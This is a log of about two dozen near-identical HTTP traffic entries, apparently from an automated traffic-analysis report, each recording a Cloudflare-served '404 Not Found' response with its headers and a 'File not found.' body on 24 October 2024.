                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oMgj9mb5DVhPQViilaESkMqQRNq75FkFzoI86%2B%2FLSOAstlIlwPiQL5h74cjUZCc7p7UBysTTZ19hMyz8nMFB9yvoSMJmcAKMHPBnBPfu0MDayVtGoP9OvZG%2BLllipw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8977ab9485e-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1746&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=420&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wTgg0Dw5vE2UisjnEfC4BAsTXGh8I6382tPffjx4Io4jsQ0Bpny6tTBVbkXqGg8FbI1f1OZf63b9gy6ZnjHHDQ8SB1CYA3dONWutngFsL6A3O5U4hTCnHH5MVQdhpw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad89e3be3e94e-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1117&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=420&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p55%2BKJFax3KSWn7A8mrMkWn0ROBaqIS7qZnfZUPsgUBgqWcxHJ%2BJtEREWuekuQUTOm2FDg9DkVk%2FfJ18QUGrjbRp5%2B68%2B082QJIBFK5XZf9gK9TOuSkLPlk6dUEAlg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8a538e84786-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1100&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aZ%2Bk8VVpUjHRRvmiOKUeB72I%2BuC1srKilKQGSpyE3xN32f826mjJThsLfS4K1qWH7nVn9Ut0jr2pzzWYLV1s7r9awm2dYPjPiIggyly3zzanBcNux6ImQEpyM7I6uA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8acfa6a6b97-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1142&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1TkBtg6ovQ5AdrN7h%2B2%2B%2F6p9NK004BkB9%2FhcWPdGyEP62UNdgjRM04rKchs7oORPcWsthMRlzjzzZy3jA2aj%2BFx8vJ6pjmbDLKT1K9Sb974wIoheJsvCXDSXf6Sahw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8b39d5245fb-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1212&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w0FNuz6F2UoI5GClneaGIROudjT4PRp%2B3IDQLFMOKtuQGk1T8lkOy%2Fgjap3lsUGwZCie7t9eX%2Fcy2hZDMKL9REwBKiQ23%2BXRqMN88lkc1x3sJA2daaSbyKISz8N95g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8ba9d936c07-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1813&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2iH4Fa8tLW9McLFlEhMKCEI7kfWqKuNzQHDc8ULdEonwEx3GQFadEs606zJZCMnQnYTQLDoE6zYTG8RaYe384EQ3ACmAjKA5M7oJEiV%2BlYH%2BUuXiivqTWodT0fHWxg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8c1fee26b06-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YJOB3EqGfH%2Ferx6aJhQ6IR7IIiIetPbHGnxenIGVgYHUVNnD%2BbGvys3z%2BbYvnFzwokqpMKMEIUfdX92Ff9m4W2hlYnQZQ8P3ifyI4froXDHsRnpVr%2BWEGnJySGp7cw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8d82d666b27-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2279&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecqebKWXcrDHQbdTvxQvwg0fTJ%2Fp1F9iS96GakokyRmu%2Fkux%2Bjx6xK6DmtAvHcSYlB5HnuHbwh5kZXdQ3lupVJUVC7SFDY9lpzBC7hAZmP0OHyAwKTCfgGbnp2CSjQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8ee6a696c39-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1173&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eLe32ZI%2FG%2BuYU3ABNJRRuZeHkyNL00TkKjEOJCmQZPeVfr3a0hu6P3VKaIf%2BTosLtMLeOOtUS2YnzCnDiq3Vt4z3XMKOnN5JgCX6bvQjhEiZSLYP5MMh866Vqg0QhQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8f4ea04e972-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2639&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciScChgOKV53j9TS3Z3ZHBFJdj1KdJt5nFbAlbeocgkV5PqB9RC%2BVHXaqmdoxIfxQ2eZwd25%2F1YNoiZzbZrq0wO1T9IhXyk2UVb1G%2Bi5SdIPvaYq4p7q8EjDBio6ow%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad8fe6fc23177-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1384&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=25RhSey%2FcM%2BswRdxG1LMHPNnjkRvLpDD5pIkJy1uHxYZwdLngLIuKBn6ZqOb9uW69EUGrO%2FtNqkVL9uzJlCvKrWr19pfk2EZOlVRRJ13VeaN3Xf4V9SWDWbbnb2ppw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad906ddf33587-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1027&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=za4JpOlF%2BOgek7zH6Hn0LC5oUB3J%2FP7D27N4YmPUBUaMmWtaDYJcE3yngqA3ZwkiGepz%2FGHtMnz9cjJmuUP3yNi%2Fcmp9DjGPmmADDkwdUrTQOf1wKeLCedVdbVEC1A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad90e4a42eb16-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1342&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5K7iotL3nAhCSPYeShaXClHk1grtDcAKT0KQvzyS19YO3ayDZ04vy0aT1%2FOrjxGa4u5hhBh2jrsiScbn5D%2FY0CMpJHbPF1HxsgP3Oojd54zA9%2F5MHLSdjcOPU9wTng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad914dcb44686-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e2M2Qre%2B6VFO1EHq7YppP8IiDqk862QfLwmiSfExtL0%2BArSrm3a00JPHe6jtDyrYl8%2FDcXU9BC8x0vTkEPGP4hEgqL8etDNeX14uLFcxTTeUJvyg6vCqgBfDEtS9Ug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad91b3a426c4f-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1960&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eu308C6Ct2CohWKQtNacv2V7v4cXH4kloVKKMFPmpdHE1GsJlXiHSmjNZlMZ%2BkJdKPvC3SeyryLD4ubhiX0uN0XLaua9EzLpvxhATYhI0%2FGy2aRjlCoeKFlh%2FbMnWw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad921eb92e836-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2232&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Os%2B5AK2Olpaw6rtRTHBzN5kgkEFg%2BLu7s2gKfOY6HJKS9C0iulTwmZnCPX4hTssvbiJLTtsNOMaHsPZnpG%2BeE8fxOMZKOMkNyWS1O2jol9lvhQw3bfx8MQLuqXYXCQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9286fe54785-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1237&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=50QhMYSqwXKbd4dAt2So0M3A8SNMYi92MLmJgic%2FSypVUrpSlvIXI2bvVXuV4mIxVpEJBj1%2FnZLAKjVwk%2BppjQ8Ccb1xaLilHo79niPKnuvRwyJYhZ1Aix68fHnjqg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad92f2f5f8d2c-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1644&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=81&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4pLn2gnsA6xxnF7szO%2BWWnraqx%2FYya5W3HTHBbRo0np%2FS55TYuV5o3fEg%2Bg58N3RUxpzZs1aErMpK4CZa52IP8HuPVdXlQ9GUYlEl3rngImI4rwhl%2BTMHF0VKhDKfg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad93d7a7b6b3c-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1938&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xZHLcL%2BmGZTykGDUb7wogaVViCdsHa3QnMB46GUt9xRjhaa0Z6sQe4GYLpeXxJVqgTt9yaHy1iN4hQAGHxJI%2F17AfbOjC9mS7M3GHwNwI3psoi3mrngZ06%2BsAYGqJQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9442cf33474-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYfuQWh1ubE6HwrD2PVFy8pPLBrP7fVwJMfundcELeNFsjHovegYWfIoCKNFtIF4ryZGybLO5WeZSF5rQRWVsBmrCctHk0UfobPkzlLNVBEOxRMebi2g86kOzRudug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad94afa724605-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1142&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLQk0UjL3x%2BLzVyi4coA%2FhX83SNnECLY0k09LvGrIcXxb2cwJIO5DWHA2MLtxu3DKYjSEUWyIz8YRcgfg6qLVpG6cmkwhVZREISEaw7LeXWhYLoGU9YtzHKSt9abOQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9582e8145f9-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsV8TR%2BGBQet%2F1qH20FzvWqGxR8lKwDM9sq1v3PhCQFYDeaIRhOGE990FTP2VyPBsbWFdZ28zWushaUPQKNtsN0fvg%2FEGlzWWl1qIUKteRsf8uW1V0%2FHsm9HEi0vmQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad95ecc776c64-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1880&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FtJivfOaxenTKizqzCB1r%2Bv4aaHT8%2B1meOxAHDGbtP0oWaaVTtfRuxUpiYogrNlqzh56%2BmAuSn8vmu9FsfgpvkHqgkYhY0MQEx1qMYTflqHnTehjoknPokWL7lpaOw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9653d082e25-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1025&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=64Gd7D9cNAC%2BWeQi18d97O%2BFHM2cC%2FGha2Okf%2Brvc8eUFr6hqhjQPUVeiElayVGGqcziWeg%2Bi3i8867%2FUsbViiFgv1uawU7xLZdhXJ8XMwfLRL8sQOHdhZZcbqblUA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad96d9f5ce534-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1343&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:02:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1dYyk%2B1aHI9sNDhPQyR3EGfuYlNJfwCjXRNV696tm84LtYrZIZKRiIExRpL1gWYXeeiPVyhxRuWQeJ76wSyNPKQDUV%2BatY%2B2GCEe6FFOY767DdHpSeeHZ9vSpvRDJA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9753bf02cce-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1524&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
